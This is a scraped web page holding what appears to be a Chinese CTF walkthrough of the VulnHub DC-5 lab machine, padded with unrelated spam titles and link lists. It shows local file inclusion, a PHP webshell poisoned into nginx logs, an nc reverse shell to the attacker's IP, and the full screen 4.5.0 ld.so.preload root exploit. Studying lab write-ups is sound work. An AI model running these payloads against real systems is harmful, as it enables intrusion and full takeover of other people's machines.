当前位置: 首页 > news >正文

重庆免费建站公司地址做木材生意的外贸网站

news 2025/12/20 12:49:30
重庆免费建站公司地址,做木材生意的外贸网站,如何查看实时街景地图,在阿里怎样做单页销售网站一.环境搭建 1.下载地址 靶机下载地址#xff1a;https://download.vulnhub.com/dc/DC-5.zip 2.虚拟机配置 切换nat模式#xff0c;有问题全选重试和是#xff0c;打到这了#xff0c;我感觉这个配置我都不用写了#xff0c;启动靶机如下图所示即可 二.开始渗透 1.信…一.环境搭建 1.下载地址 靶机下载地址https://download.vulnhub.com/dc/DC-5.zip 2.虚拟机配置 切换nat模式有问题全选重试和是打到这了我感觉这个配置我都不用写了启动靶机如下图所示即可 二.开始渗透 1.信息收集 同样扫描kali同一网段查看靶机的ip地址 arp-scan -l 得到靶机ip地址为192.168.111.133kali攻击机ip地址为192.168.111.128 用nmap扫描一下靶机开启了什么端口和服务 nmap -p- -sV 192.168.111.133 开启一个http去浏览器看看这个http服务 翻译一下他的文章内容 啥玩意没有点击contact发现一个留言板测试了xss啥也没有 用目录扫描工具进行目录扫描 dirsearch -u http://192.168.111.133 扫描到几个比较可疑的路径footer和thankyou点击进去看看 刷新他们俩的界面日期会随机改变thankyou.php引用了footer.php  尝试文件包含读取thankyou.php文件和其他文件发现有内容输出 http://192.168.111.133/thankyou.php?filephp://filter/convert.base64-encode/resource./thankyou.php 读取/etc/passwd可以看到读取内容  2.获取shell 得知文件包含漏洞我们可以在ssh日志中间件日志以及临时文件中写入一句话木马然后进行包含即可解析。我们可以利用nginx日志写入一句话木马 whatweb -v http://192.168.111.133 根据这个工具我们可以得知这个网站的中间件为nginx 在url中构造一个一句话木马并且访问日志会记录下来 http://192.168.111.133/?php eval($_POST[mlws]); ? 上面那个没试过下面这个试了成功 都需要在bp中进行操作 /thankyou.php?file?php eval($_POST[mlws]);? 一般来说linux的nginx访问日志放在如下目录 /var/log/nginx/access.log 错误日志路径如下 /var/log/nginx/error.log 构造如下url http://192.168.111.133/thankyou.php?file/var/log/nginx/access.log 上面的这个链接试过了可以访问下面这个链接没试过可以尝试一下  http://192.168.111.133/thankyou.php?file/var/log/nginx/error.log 以上操作要在bp中发包我直接在浏览器中修改不知道为什么无法写入 如上图所示我试了在浏览器中无法写入日志打开蚁剑连接shell 3.反弹shell kali端启一个端口监听 nc -lvvp 4444 在蚁剑打开终端输入如下命令 nc 192.168.111.128 4444 -e /bin/bash 用python创建一个交互式的shell python -c import pty;pty.spawn(/bin/bash) 4.提权 进行suid提权执行如下命令 find / -perm -us -type f 2/dev/null 可以看到一个screen-4.5.0在kali的漏洞库查看是否有提权漏洞 searchsploit screen 4.5.0 刚好有两个本地权限提升的漏洞可以利用查看漏洞的具体内容 searchsploit -p 41154 查看文件的内容 cat /usr/share/exploitdb/exploits/linux/local/41154.sh 得到如下内容 #!/bin/bash # screenroot.sh # setuid screen v4.5.0 local root exploit # abuses ld.so.preload overwriting to get root. # bug: https://lists.gnu.org/archive/html/screen-devel/2017-01/msg00025.html # HACK THE PLANET # ~ infodox (25/1/2017) echo ~ gnu/screenroot ~ echo [] First, we create our shell and library... cat EOF /tmp/libhax.c #include stdio.h #include sys/types.h #include unistd.h __attribute__ ((__constructor__)) void dropshell(void){chown(/tmp/rootshell, 0, 0);chmod(/tmp/rootshell, 04755);unlink(/etc/ld.so.preload);printf([] done!\n); } EOF gcc -fPIC -shared -ldl -o /tmp/libhax.so /tmp/libhax.c rm -f /tmp/libhax.c cat EOF /tmp/rootshell.c #include stdio.h int main(void){setuid(0);setgid(0);seteuid(0);setegid(0);execvp(/bin/sh, NULL, NULL); } EOF gcc -o /tmp/rootshell /tmp/rootshell.c rm -f /tmp/rootshell.c echo [] Now we create our /etc/ld.so.preload file... cd /etc umask 000 # because screen -D -m -L ld.so.preload echo -ne \x0a/tmp/libhax.so # newline needed echo [] Triggering... screen -ls # screen itself is setuid, so... /tmp/rootshell 先将第一部分写入libhax.c文件中 第一部分 #include stdio.h #include sys/types.h #include unistd.h __attribute__ ((__constructor__)) void dropshell(void){chown(/tmp/rootshell, 0, 0);chmod(/tmp/rootshell, 04755);unlink(/etc/ld.so.preload);printf([] done!\n); }然后进行编译 gcc -fPIC -shared -ldl -o libhax.so libhax.c 将中间的代码存入rootshell.c中 中间部分代码 #include stdio.h int main(void){setuid(0);setgid(0);seteuid(0);setegid(0);execvp(/bin/sh, NULL, NULL); }进行编译 gcc -o rootshell rootshell.c 剩余的代码保存到dc5.sh echo [] Now we create our /etc/ld.so.preload file... cd /etc umask 000 # because screen -D -m -L ld.so.preload echo -ne \x0a/tmp/libhax.so # newline needed echo [] Triggering... screen -ls # screen itself is setuid, so... /tmp/rootshell 并且输入 :set ffunix 将如下三个文件上传至/temp目录下注意不是/var/temp 给予运行权限 chmod 777 dc5.sh ./dc5.sh 无法执行脚本发现很多wp都有提到这个问题不知解决方法也尝试了exim4也是无效
http://www.pierceye.com/news/861856/

相关文章:

  • 广州 网站开发 公司怎样做一个公众号
  • 注册网站域名需要什么河南网站建设定制
  • 白种女人做爰网站网站建设新闻动态
  • 360百度网站怎么做徐州企业建站模板
  • 宁波做公司网站的公司wordpress 说说 插件
  • 做毕业设计网站教程网页设计培训机构多少钱
  • 展览馆网站建设方案书wordpress 搬家 sae
  • 网站建设服务开税率多少的票重庆公积金门户网站
  • 网站推广的策略有哪些免费创建个人网站申请
  • 网站建设合同制苏中建设集团网站
  • 如何用织梦程序制作多个页面网站免费域名解析网站建设
  • 安徽省建筑人员信息网广州百度seo优化排名
  • 北海网站建设培训机构专业
  • 江苏艺居建设有限公司网站企业营销网站开发建设专家
  • 莱芜网站优化排名西安工程建设工程信息网
  • 二手网站建设的策划php做网站都需要学什么软件
  • 作品集的个人网站怎么做抖音代运营怎么样呢
  • 电子商务网页设计与网站建设论文在线设计培训
  • 做旅游网站的项目背景软件开发手册
  • 宁波品牌网站设计app外包接活
  • 清远市住房和城乡建设局门户网站图片软件制作工具
  • 宝马itms做课网站网站开发群
  • 网站开发工作协议书范本谷歌优化软件
  • 什么网站都能进的浏览器企业融资方案
  • 网站建设公司领导致辞自己可以开发一个软件吗
  • 高端网站设计平台专门做二手书网站或app
  • 系网站建设工作总结大庆建设网站表格下载
  • 免费建站网站seo长春专业网站制作
  • 做网站公司哪家正规公司网站如何更改内容
  • 广州黄埔区建设局网站局wordpress怎么看访问量